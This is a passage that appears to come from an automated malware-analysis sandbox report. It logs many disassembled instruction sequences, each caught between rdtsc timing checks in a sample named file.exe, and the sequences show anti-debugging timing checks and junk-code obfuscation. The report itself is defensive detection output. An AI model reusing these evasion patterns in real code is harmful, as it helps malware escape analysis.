push edx 0x00000085 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8B80D second address: E8B811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8B811 second address: E8B817 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E708A5 second address: E708E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA44C7ED58h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007FEA44C7ED7Dh 0x0000000f push eax 0x00000010 push edx 0x00000011 js 00007FEA44C7ED46h 0x00000017 jmp 00007FEA44C7ED51h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E708E0 second address: E708EA instructions: 0x00000000 rdtsc 0x00000002 ja 00007FEA44C4CAB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E708EA second address: E708F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAA36F second address: EAA388 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FEA44C4CAB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FEA44C4CABBh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAA388 second address: EAA38C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAA38C second address: EAA390 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAA390 second address: EAA39F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FEA44C7ED46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAA39F second address: EAA3A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAA517 second address: EAA51E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAA51E second address: EAA52D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA44C4CABAh 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAA92B second address: EAA937 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FEA44C7ED46h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAAAD9 second address: EAAADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAAC4E second address: EAAC54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAB096 second address: EAB09C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAB34A second address: EAB354 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FEA44C7ED46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAB354 second address: EAB367 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEA44C4CABFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAB4B1 second address: EAB4C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA44C7ED52h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAB4C7 second address: EAB4CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAB4CD second address: EAB4E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEA44C7ED4Bh 0x00000008 jg 00007FEA44C7ED46h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAC079 second address: EAC07F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAD35B second address: EAD365 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FEA44C7ED46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EADB25 second address: EADB29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EADB29 second address: EADB2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB7714 second address: EB771A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB771A second address: EB771F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB78BC second address: EB78C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jbe 00007FEA44C4CAB6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB79DC second address: EB79E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB79E6 second address: EB79F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FEA44C4CAB6h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB79F4 second address: EB7A1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007FEA44C7ED4Eh 0x0000000f pop esi 0x00000010 pushad 0x00000011 push esi 0x00000012 pop esi 0x00000013 jl 00007FEA44C7ED46h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB7A1D second address: EB7A4D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FEA44C4CAC3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FEA44C4CAC4h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB7EE8 second address: EB7EED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB7EED second address: EB7F1F instructions: 0x00000000 rdtsc 0x00000002 jng 00007FEA44C4CABCh 0x00000008 jno 00007FEA44C4CAB6h 0x0000000e jmp 00007FEA44C4CABDh 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FEA44C4CAC3h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB7F1F second address: EB7F34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEA44C7ED51h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB7F34 second address: EB7F38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB81A4 second address: EB81C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA44C7ED52h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007FEA44C7ED46h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB81C6 second address: EB81CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBA2EA second address: EBA2F4 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FEA44C7ED4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBA45F second address: EBA463 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBA653 second address: EBA658 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBAFDC second address: EBAFE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBAFE2 second address: EBAFE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBAFE6 second address: EBAFFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jc 00007FEA44C4CAB6h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBB0E2 second address: EBB0E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBB0E8 second address: EBB125 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA44C4CAC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007FEA44C4CAC8h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBB355 second address: EBB359 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBB469 second address: EBB46D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBBA47 second address: EBBA74 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FEA44C7ED48h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007FEA44C7ED57h 0x00000013 push eax 0x00000014 push edx 0x00000015 jc 00007FEA44C7ED46h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBD694 second address: EBD69E instructions: 0x00000000 rdtsc 0x00000002 jg 00007FEA44C4CAB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBED64 second address: EBED69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBED69 second address: EBED6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBF5B7 second address: EBF5BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC0ABC second address: EC0AC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC4483 second address: EC4487 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7E45D second address: E7E46E instructions: 0x00000000 rdtsc 0x00000002 jne 00007FEA44C4CAB6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ecx 0x0000000d push ecx 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC4C1B second address: EC4C21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC7990 second address: EC7A18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jne 00007FEA44C4CAB6h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ebp 0x00000014 call 00007FEA44C4CAB8h 0x00000019 pop ebp 0x0000001a mov dword ptr [esp+04h], ebp 0x0000001e add dword ptr [esp+04h], 00000016h 0x00000026 inc ebp 0x00000027 push ebp 0x00000028 ret 0x00000029 pop ebp 0x0000002a ret 0x0000002b push 00000000h 0x0000002d mov dword ptr [ebp+122D36DEh], eax 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push edi 0x00000038 call 00007FEA44C4CAB8h 0x0000003d pop edi 0x0000003e mov dword ptr [esp+04h], edi 0x00000042 add dword ptr [esp+04h], 00000019h 0x0000004a inc edi 0x0000004b push edi 0x0000004c ret 0x0000004d pop edi 0x0000004e ret 0x0000004f jmp 00007FEA44C4CABBh 0x00000054 xchg eax, esi 0x00000055 jne 00007FEA44C4CABAh 0x0000005b push eax 0x0000005c push eax 0x0000005d push edx 0x0000005e jmp 00007FEA44C4CAC5h 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC6BDB second address: EC6BDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC7A18 second address: EC7A1D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC4CE3 second address: EC4D00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA44C7ED58h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC6BDF second address: EC6BE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC6BE5 second address: EC6BEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC6BEA second address: EC6BF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC8A33 second address: EC8A37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC9AFA second address: EC9AFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC9AFE second address: EC9B02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC9B02 second address: EC9B08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECBA35 second address: ECBA6D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA44C7ED50h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007FEA44C7ED58h 0x00000013 jnl 00007FEA44C7ED46h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC9B08 second address: EC9B22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA44C4CAC0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECCB83 second address: ECCB87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECCB87 second address: ECCB97 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FEA44C4CAB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edi 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECFBF8 second address: ECFC07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FEA44C7ED46h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECFC07 second address: ECFC0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECFC0B second address: ECFC0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED11FE second address: ED1202 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED1202 second address: ED1206 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED1206 second address: ED1214 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FEA44C4CABCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED1452 second address: ED145C instructions: 0x00000000 rdtsc 0x00000002 jc 00007FEA44C7ED4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED145C second address: ED14FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 xor edi, 31222C8Eh 0x0000000d push dword ptr fs:[00000000h] 0x00000014 mov dword ptr [ebp+12453A96h], ebx 0x0000001a mov dword ptr fs:[00000000h], esp 0x00000021 sub dword ptr [ebp+122D18E4h], eax 0x00000027 mov dword ptr [ebp+12464EE8h], edi 0x0000002d mov eax, dword ptr [ebp+122D10A9h] 0x00000033 push 00000000h 0x00000035 push ebp 0x00000036 call 00007FEA44C4CAB8h 0x0000003b pop ebp 0x0000003c mov dword ptr [esp+04h], ebp 0x00000040 add dword ptr [esp+04h], 00000017h 0x00000048 inc ebp 0x00000049 push ebp 0x0000004a ret 0x0000004b pop ebp 0x0000004c ret 0x0000004d push FFFFFFFFh 0x0000004f jmp 00007FEA44C4CAC9h 0x00000054 nop 0x00000055 pushad 0x00000056 jmp 00007FEA44C4CABDh 0x0000005b pushad 0x0000005c push edi 0x0000005d pop edi 0x0000005e jmp 00007FEA44C4CABEh 0x00000063 popad 0x00000064 popad 0x00000065 push eax 0x00000066 pushad 0x00000067 jmp 00007FEA44C4CABAh 0x0000006c pushad 0x0000006d push eax 0x0000006e push edx 0x0000006f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED2349 second address: ED234F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED234F second address: ED23DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d movzx edi, dx 0x00000010 push dword ptr fs:[00000000h] 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007FEA44C4CAB8h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 00000016h 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 mov ebx, eax 0x00000033 mov edi, 74D1BF39h 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f push 00000000h 0x00000041 push eax 0x00000042 call 00007FEA44C4CAB8h 0x00000047 pop eax 0x00000048 mov dword ptr [esp+04h], eax 0x0000004c add dword ptr [esp+04h], 00000019h 0x00000054 inc eax 0x00000055 push eax 0x00000056 ret 0x00000057 pop eax 0x00000058 ret 0x00000059 sub ebx, 6EFE8CD4h 0x0000005f mov eax, dword ptr [ebp+122D0A09h] 0x00000065 sub dword ptr [ebp+12453A96h], edi 0x0000006b push FFFFFFFFh 0x0000006d or ebx, 7BD238E4h 0x00000073 nop 0x00000074 jmp 00007FEA44C4CABAh 0x00000079 push eax 0x0000007a pushad 0x0000007b push edi 0x0000007c push eax 0x0000007d push edx 0x0000007e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED3376 second address: ED3405 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jns 00007FEA44C7ED54h 0x0000000d nop 0x0000000e mov dword ptr [ebp+122D1C8Ch], esi 0x00000014 mov bl, 64h 0x00000016 push dword ptr fs:[00000000h] 0x0000001d push 00000000h 0x0000001f push ebp 0x00000020 call 00007FEA44C7ED48h 0x00000025 pop ebp 0x00000026 mov dword ptr [esp+04h], ebp 0x0000002a add dword ptr [esp+04h], 00000014h 0x00000032 inc ebp 0x00000033 push ebp 0x00000034 ret 0x00000035 pop ebp 0x00000036 ret 0x00000037 add ebx, dword ptr [ebp+122D1C07h] 0x0000003d xor bl, 00000006h 0x00000040 mov dword ptr fs:[00000000h], esp 0x00000047 movsx edi, si 0x0000004a mov eax, dword ptr [ebp+122D1245h] 0x00000050 xor dword ptr [ebp+122D1C29h], esi 0x00000056 push FFFFFFFFh 0x00000058 push 00000000h 0x0000005a push ebp 0x0000005b call 00007FEA44C7ED48h 0x00000060 pop ebp 0x00000061 mov dword ptr [esp+04h], ebp 0x00000065 add dword ptr [esp+04h], 00000014h 0x0000006d inc ebp 0x0000006e push ebp 0x0000006f ret 0x00000070 pop ebp 0x00000071 ret 0x00000072 mov dword ptr [ebp+122D1C07h], esi 0x00000078 nop 0x00000079 pushad 0x0000007a pushad 0x0000007b push eax 0x0000007c push edx 0x0000007d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED3405 second address: ED340B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED340B second address: ED3439 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FEA44C7ED4Bh 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007FEA44C7ED53h 0x00000012 push eax 0x00000013 push edx 0x00000014 jno 00007FEA44C7ED46h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED446F second address: ED44A2 instructions: 0x00000000 rdtsc 0x00000002 je 00007FEA44C4CABCh 0x00000008 jne 00007FEA44C4CAB6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jmp 00007FEA44C4CAC8h 0x00000019 jne 00007FEA44C4CAB6h 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E6EE13 second address: E6EE24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
